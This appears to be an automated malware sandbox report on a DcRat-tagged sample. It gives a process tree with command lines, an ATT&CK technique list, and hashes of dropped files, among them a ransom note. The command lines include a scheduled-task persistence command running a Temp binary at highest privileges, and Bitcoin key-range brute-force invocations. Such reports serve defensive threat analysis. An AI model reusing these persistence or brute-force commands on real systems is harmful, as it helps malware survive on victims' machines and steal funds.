                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:5000
                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks.exe /create /tn "winhostDhcpw" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                            PID:2212
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 7164 -ip 7164
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:6232
                                                                                                                                                                                                                                                                            • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                                                                                                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                                                                                              PID:4936
                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\GameServerClient\GameService.exe"
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:6660
                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\GameServerClient\GameClient.exe
                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\GameServerClient\GameClient.exe"
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:2780
                                                                                                                                                                                                                                                                                    • C:\Windows\Temp\62967.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\Temp\62967.exe" --points 512 --out xxx.txt --keyspace 22fb85a3800000000:22fb85a4000000000 13zb1hQbWVsc2S7ZTZnP2G4undNNpdh5so 1FM8tEdjqtMf5mAFj3zJLgiJbbMAH3fPpq
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                      PID:1408
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:6448
                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameServerClient\GameService.exe
                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\GameServerClient\GameService.exe"
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:6412
                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\GameServerClient\GameClientC.exe
                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\GameServerClient\GameClientC.exe"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:6828
                                                                                                                                                                                                                                                                                          • C:\Windows\Temp\749687.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\Temp\749687.exe" --coin BTC -m ADDRESSES -t 0 --range 22fb85a3800000000:22fb85a4000000000 -o xxx0.txt -i C:\Windows\Temp\curjob.bin
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:4624
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:268
                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                            PID:5556
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:3728
                                                                                                                                                                                                                                                                                            • C:\Windows\ImmersiveControlPanel\SystemSettings.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:1904
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:5968
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\oobe\UserOOBEBroker.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                  PID:5140
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                  PID:6092
                                                                                                                                                                                                                                                                                                  • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                                                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\FILECO~1.EXE" -Embedding
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                    PID:2652
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3582-490\FILECO~1.EXE
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\3582-490\FILECO~1.EXE -Embedding
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                      • Checks system information in the registry
                                                                                                                                                                                                                                                                                                      PID:5416
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                  PID:2280
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                  PID:6640
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                  PID:6600
                                                                                                                                                                                                                                                                                                  • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                                                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\FILECO~1.EXE" -Embedding
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                    PID:6132
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3582-490\FILECO~1.EXE
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\3582-490\FILECO~1.EXE -Embedding
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                      • Checks system information in the registry
                                                                                                                                                                                                                                                                                                      PID:1300
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                                                                                  "LogonUI.exe" /flags:0x4 /state0:0xa3831055 /state1:0x41c64e6d
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                  PID:2092
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:5452

                                                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                                                                                  Initial Access

                                                                                                                                                                                                                                                                                                  Replication Through Removable Media

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1091

                                                                                                                                                                                                                                                                                                  Execution

                                                                                                                                                                                                                                                                                                  Scripting

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1064

                                                                                                                                                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                  Persistence

                                                                                                                                                                                                                                                                                                  Create or Modify System Process

                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                  T1543

                                                                                                                                                                                                                                                                                                  Windows Service

                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                  T1543.003

                                                                                                                                                                                                                                                                                                  Event Triggered Execution

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1546

                                                                                                                                                                                                                                                                                                  Change Default File Association

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1546.001

                                                                                                                                                                                                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1547

                                                                                                                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1547.001

                                                                                                                                                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                                                                                                                                                  Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1548

                                                                                                                                                                                                                                                                                                  Bypass User Account Control

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1548.002

                                                                                                                                                                                                                                                                                                  Create or Modify System Process

                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                  T1543

                                                                                                                                                                                                                                                                                                  Windows Service

                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                  T1543.003

                                                                                                                                                                                                                                                                                                  Event Triggered Execution

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1546

                                                                                                                                                                                                                                                                                                  Change Default File Association

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1546.001

                                                                                                                                                                                                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1547

                                                                                                                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1547.001

                                                                                                                                                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                                                                                                                                  Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1548

                                                                                                                                                                                                                                                                                                  Bypass User Account Control

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1548.002

                                                                                                                                                                                                                                                                                                  Impair Defenses

                                                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                                                  T1562

                                                                                                                                                                                                                                                                                                  Disable or Modify Tools

                                                                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                                                                  T1562.001

                                                                                                                                                                                                                                                                                                  Disable or Modify System Firewall

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1562.004

                                                                                                                                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                                                  T1112

                                                                                                                                                                                                                                                                                                  Indicator Removal

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1070

                                                                                                                                                                                                                                                                                                  File Deletion

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1070.004

                                                                                                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                                                                                                  File and Directory Permissions Modification

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1222

                                                                                                                                                                                                                                                                                                  Scripting

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1064

                                                                                                                                                                                                                                                                                                  Subvert Trust Controls

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1553

                                                                                                                                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1553.004

                                                                                                                                                                                                                                                                                                  Hide Artifacts

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1564

                                                                                                                                                                                                                                                                                                  Hidden Files and Directories

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1564.001

                                                                                                                                                                                                                                                                                                  Credential Access

                                                                                                                                                                                                                                                                                                  Unsecured Credentials

                                                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                                                  T1552

                                                                                                                                                                                                                                                                                                  Credentials In Files

                                                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                                                  T1552.001

                                                                                                                                                                                                                                                                                                  Credentials in Registry

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1552.002

                                                                                                                                                                                                                                                                                                  Discovery

                                                                                                                                                                                                                                                                                                  Query Registry

                                                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                                                  T1012

                                                                                                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                                                                                                  Network Service Discovery

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1046

                                                                                                                                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                                                                                                                                  7
                                                                                                                                                                                                                                                                                                  T1082

                                                                                                                                                                                                                                                                                                  Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1120

                                                                                                                                                                                                                                                                                                  Remote System Discovery

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1018

                                                                                                                                                                                                                                                                                                  Lateral Movement

                                                                                                                                                                                                                                                                                                  Replication Through Removable Media

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1091

                                                                                                                                                                                                                                                                                                  Collection

                                                                                                                                                                                                                                                                                                  Data from Local System

                                                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                                                  T1005

                                                                                                                                                                                                                                                                                                  Email Collection

                                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                                  T1114

                                                                                                                                                                                                                                                                                                  Command and Control

                                                                                                                                                                                                                                                                                                  Web Service

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1102

                                                                                                                                                                                                                                                                                                  Impact

                                                                                                                                                                                                                                                                                                  Inhibit System Recovery

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1490

                                                                                                                                                                                                                                                                                                  Service Stop

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1489

                                                                                                                                                                                                                                                                                                  Defacement

                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                  T1491

                                                                                                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                                                                                                  • C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    328KB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    39c8a4c2c3984b64b701b85cb724533b

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    c911f4c4070dfe9a35d9adcb7de6e6fb1482ce00

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    888a1dd0033e5d758a4e731e3e55357de866e80d03b1b194375f714e1fd4351d

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    f42ca2962fe60cff1a13dea8b81ff0647b317c785ee4f5159c38487c34d33aecba8478757047d31ab2ee893fbdcb91a21655353456ba6a018fc71b2278db4db2

                                                                                                                                                                                                                                                                                                  • C:\PerfLogs\DECRYPT-FILES.txt
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    10KB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    a4d3646eaf06b15758cb34dbd24667de

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    60ff4e2bac5bdb667c01197ce8c3dbf7b3b93ad9

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    6a1dd3b756128de4633f0a8948a57a8b2c53212743b023e287f3583d95b4cc38

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    b23bf033d802b84750e6ffc578802b976059a421291d9303ccc4d9a41665409e804aef9dfcc99229ee625828596d4636b5d7ffd56d132ee442d1a0a2e793e081

                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    3.2MB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    88bec53e56a6b3121e0574d1c663d067

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    681608f0cadf80ba96652b9c488516caf70e7b0f

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    c6fbfeeee15a2fe7302a80fd5e679cec3212f4eb1a92ef14dd7f19a19a107299

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    c60926f095fb4bd4ddd351d61e412eca97246f8dce14c655c9a54741c078fcb1380730758ca4d35a84da968b4284c8787ab10dc3884adf5e5f8cba58db2adde3

                                                                                                                                                                                                                                                                                                  • C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\@[email protected]
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    1KB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    4a23100826582e0126749ceb9c0095b9

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    3ed5c502b6c49917f9cdfddaced80c3fed0c6fa8

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    0851e9c112692338718db2fa8bef4e78b6ad125a3ae3f5665cc2aa6f83e31915

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    dfec6c60491ca933f0e65e7a1c1c702c30e791deecf66e1c8700ea7cda0bad836857efeda571902c4027e4cef7d3a9d9f815958b0033e8fcd2c761969df09e6f

                                                                                                                                                                                                                                                                                                  • C:\ProgramData\SoftwareDistribution\[email protected]
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    564KB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    748a4bea8c0624a4c7a69f67263e0839

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    6955b7d516df38992ac6bff9d0b0f5df150df859

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd

                                                                                                                                                                                                                                                                                                  • C:\ProgramData\system.exe
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    37KB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    e817d74d13c658890ff3a4c01ab44c62

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    bf0b97392e7d56eee0b63dc65efff4db883cb0c7

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    2945881f15e98a18d27108a29963988190853838f34faf3020e6c3c97342672d

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    8d90ef308c1e0b7e01e7732e2cd819f07bfc1ef06e523efa81694ced75550c9f1be460fc9de412faeb96273a6492580402ab9c9538ed441fc26d96b6785e7815

                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    152B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    f3f6e86c8b7bdc605f5559df800bfd34

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    862d05bfba760ae8adcbb509216dc18ead59a6b2

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    5dfe9be21d4916615025055f1a70151362bdb404b40f074685e39b33ad545a78

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    de576ebf0cbe1c5e7639c42517253796cf4b5770298271ac2e6958404998f2d6b8e3378a535f2f316f4020fd8e60b5cc9c1b6b5171d307ca3215afe8ac47a7c3

                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    152B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    f1a9c7fa806c60a3c2ed8a7829b1461f

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    376cafc1b1b6b2a70cd56455124554c21b25c683

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    1eb39b1409ce78188c133089bf3660393ac043b5baade7ff322df5a0ca95380b

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    e1cb2f84b5cbd86b107c0a9ec0356ab65a54c91208f9f8e83fec64bf17ae89356a09b0cd39d2726424f4041d7b25b962c23672b8645c2e10f11ff4d2075f4afd

                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    152B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    a10044a267f35f920a0d504c6a15171b

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    2693b0573c4482dd6cebd245f79b47b441b38c7a

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    b9f3f98a409b31700b32d4548db54ce53bc26dd3b02d1455da0e7eed255597e8

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    f3e47a45cc70b086b6eaf4ebf7626cf9bd353144c9359dc241ad576d4bd0741dc9c8e630dccdb22b77f6a778c479e7cfbfb72c565e64b374cb4be07537444352

                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    152B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    b0dc02605c91e0600b733d9dbbb37b3c

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    92d8de52152a2e114c9e21f264d689cdc0a7022c

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    7a9b799710c3b2f938f08b8407dad96a971dcc9f3b3c9595d7913bf76f9ac535

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    51d3e4246276c48c8691356748fdcdf3e2f09330649c8a7d89bdc14bce447e693a1c835e2fe17afb29e8b6893df79a971090608d3cc2295ee661b2f5f6db793d

                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    1KB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    3189aa3efe66b840c9a5387987467ed3

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    8d66b69e6cc7e271b1e53caedd4ba87a1a94ec39

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    200a98efe8f70f3a2388481c0fe78954daafbd95475fe3e85edc08f1a9ae441b

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    0db85ded287eb92d4f9d03c14a8b88cacf283c2c0812fd0a90a19b216504cd409c297dab989a1b54c901c862514a4463801921b699587d75c02030dabde57d91

                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    111B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    807419ca9a4734feaf8d8563a003b048

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    a723c7d60a65886ffa068711f1e900ccc85922a6

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    6KB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    a6fb68dc4d6699eecef53a6ce6f2b88d

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    8938f6418bb4c81eebc522e908475a37a5caaa81

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    ea53ca0610dd2240d47dcaf97cce36b164f78cf518b09cfd230bcfe8e5b3a881

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    fa59f62eafc745858e2b0426076b9b31e6c0873685343eea84b4f333f984ebac48fdf72ba0ee6afb3e044e464036d460e357f31bef2f3108e88afa5c6bdcb305

                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                                                                                                                                                    Filesize

